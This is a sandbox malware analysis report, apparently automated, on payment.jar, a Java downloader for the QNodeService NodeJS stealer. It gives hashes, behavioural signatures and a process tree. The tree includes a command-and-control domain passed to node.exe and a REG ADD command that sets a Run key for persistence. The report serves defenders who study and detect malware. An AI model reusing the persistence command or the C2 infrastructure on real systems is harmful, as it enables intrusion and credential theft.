Analysis
-
max time kernel
128s -
max time network
142s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
05-11-2020 09:41
Static task
static1
Behavioral task
behavioral1
Sample
payment.jar
Resource
win7v20201028
Behavioral task
behavioral2
Sample
payment.jar
Resource
win10v20201028
General
-
Target
payment.jar
-
Size
65KB
-
MD5
493b0bef6259b1e451e304e68164c891
-
SHA1
a20d3ab73bafde4d7818cea9fd22de3d83072c91
-
SHA256
7dabb16da3b6b7a4a98f02a852d0d6d46b11a2c60fec5749a234368e2204c8fc
-
SHA512
1a300670283431ab5347dc05057d48a2736cd0119466e96a7fd15a75d451a454bc7446d15423c3362d889d006787ac93709b3e2a37acb7daf24de38d07785e40
Malware Config
Signatures
-
QNodeService
Trojan/stealer written in NodeJS and spread via Java downloader.
-
Executes dropped EXE 3 IoCs
pid Process 3992 node.exe 496 node.exe 4056 node.exe -
Loads dropped DLL 6 IoCs
pid Process 4056 node.exe 4056 node.exe 4056 node.exe 4056 node.exe 4056 node.exe 4056 node.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\b0d9e588-45c4-441c-8935-d1f52f9740cb = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\"" reg.exe -
JavaScript code in executable 3 IoCs
resource yara_rule behavioral2/files/0x000100000001ab7a-166.dat js behavioral2/files/0x000100000001ab7a-169.dat js behavioral2/files/0x000100000001ab7a-173.dat js -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 23 wtfismyip.com 24 wtfismyip.com -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 3992 node.exe 3992 node.exe 3992 node.exe 3992 node.exe 496 node.exe 496 node.exe 496 node.exe 496 node.exe 4056 node.exe 4056 node.exe 4056 node.exe 4056 node.exe 4056 node.exe 4056 node.exe 4056 node.exe 4056 node.exe 4056 node.exe 4056 node.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 3304 wrote to memory of 2152 3304 java.exe 76 PID 3304 wrote to memory of 2152 3304 java.exe 76 PID 2152 wrote to memory of 3992 2152 javaw.exe 80 PID 2152 wrote to memory of 3992 2152 javaw.exe 80 PID 3992 wrote to memory of 496 3992 node.exe 82 PID 3992 wrote to memory of 496 3992 node.exe 82 PID 496 wrote to memory of 4056 496 node.exe 83 PID 496 wrote to memory of 4056 496 node.exe 83 PID 4056 wrote to memory of 3428 4056 node.exe 85 PID 4056 wrote to memory of 3428 4056 node.exe 85 PID 3428 wrote to memory of 1020 3428 cmd.exe 86 PID 3428 wrote to memory of 1020 3428 cmd.exe 86
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar C:\Users\Admin\AppData\Local\Temp\payment.jar1⤵
- Suspicious use of WriteProcessMemory
PID:3304 -
C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\4e5621fa.tmp2⤵
- Suspicious use of WriteProcessMemory
PID:2152 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain empefarm.ddns.net3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3992 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_SAz58l\boot.js --hub-domain empefarm.ddns.net4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:496 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_SAz58l\boot.js --hub-domain empefarm.ddns.net5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4056 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "b0d9e588-45c4-441c-8935-d1f52f9740cb" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""6⤵
- Suspicious use of WriteProcessMemory
PID:3428 -
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "b0d9e588-45c4-441c-8935-d1f52f9740cb" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""7⤵
- Adds Run key to start application
PID:1020
-
-
-
-
-
-